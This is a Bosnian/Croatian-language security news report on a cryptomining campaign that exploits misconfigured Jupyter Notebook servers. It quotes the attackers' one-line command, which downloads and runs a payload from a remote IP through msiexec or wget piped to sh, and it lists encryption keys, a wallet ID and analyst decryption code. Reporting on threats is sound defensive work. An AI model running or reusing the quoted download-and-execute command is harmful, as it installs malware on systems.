Identificirana je nova kampanja kriptominiranja koja iskorištava pogrešno konfigurirane Jupyter notebook računare, ciljajući i Windows i Linux sisteme.
Napad koristi otkrivene instance Jupyter Notebook-a, interaktivne aplikacije koju naširoko koriste naučnici podataka i koja sadrži Python IDE, za implementaciju malicioznog koda koji instalira softver za rudarenje kriptovaluta na kompromitovane sisteme.
Kampanja počinje iskorišćavanjem nezaštićenih Jupyter okruženja za izvršavanje naredbe koja pokušava instalirati maliciozni softver na više metoda.
Početno opterećenje pokušava da preuzme ili MSI datoteku za Windows sisteme ili JavaScript datoteku za Linux okruženja koristeći naredbu: “(ipconfig && msiexec /i http://45.130.22.219/py0217.msi) || (wget -q -O- http://45.130.22.219/py0217.js|sh)”
Analitičari u Cado Security Labs-u su identifikovali ovaj napad kroz svoje sisteme honeypot, napominjući da kampanja predstavlja novi vektor za napade na kriptomajnovanje koji ranije nije bio prijavljen, uprkos tome što deli sličnosti sa ranijim kampanjama koje su ciljale Ivanti Connect Secure i korejske web servere.
Kada cilja na Windows sisteme, napad preuzima MSI instalater koji sadrži 64-bitni Windows izvršni fajl pod nazivom “Binary.freedllbinary”.
Ovaj binarni program učitava sekundarni korisni teret pod nazivom “java.exe” koji je pohranjen u c:\ProgramData. Uprkos svom nazivu, “java.exe” je zapravo zlonamjerna binarna datoteka prepuna UPX-a koja preuzima šifrirani blob pod nazivom “x2.dat” iz različitih skladišta uključujući Github, Launchpad i Gitee.
Lanac napada
Napadači koriste sofisticirane tehnike šifrovanja kako bi sakrili svoje korisne podatke.
Datoteka “x2.dat” je šifrirana sa ChaCha20 korištenjem nonce “aQFabieiNxCjk6ygb1X61HpjGfSKq4zH” i ključa “AZIzJi2WxU0G” prije nego što se kompresuje sa zlib.
Kod za dešifrovanje ovog korisnog opterećenja je sljedeći: –
from Crypto.Cipher import ChaCha20
import zlib
key = b' '
nonce = b' '
with open('', 'rb') as f:
ciphertext = f.read()
cipher = ChaCha20.new(key=key, nonce=nonce)
plaintext = cipher. Decrypt(ciphertext)
# Decompress with zlib after decryption
decompressed_data = zlib.decompress(plaintext)Za Linux sisteme, napad preuzima bash skriptu “0217.js” koja preuzima dvije ELF binarne datoteke i postavlja cronjobs kako bi se osigurala postojanost.
.webp)
Maliciozni softver cilja kriptovalute uključujući Monero, Sumokoin, ArQma i nekoliko drugih, koristeći ID novčanika „44Q4cH4jHoAZgyHiYBTU9D7rLsdV82y4EvPRkjgdMQThPLJVB3ZbD9Sc1i84QZ9eHYgb9VV”.
Organizacije bi trebale implementirati snažnu autentifikaciju, onemogućiti javni pristup Jupyter instancama i redovno nadgledati okruženja u cloud-u radi neuobičajenih aktivnosti kako bi ublažila ove napade.
Izvor: CyberSecurityNews
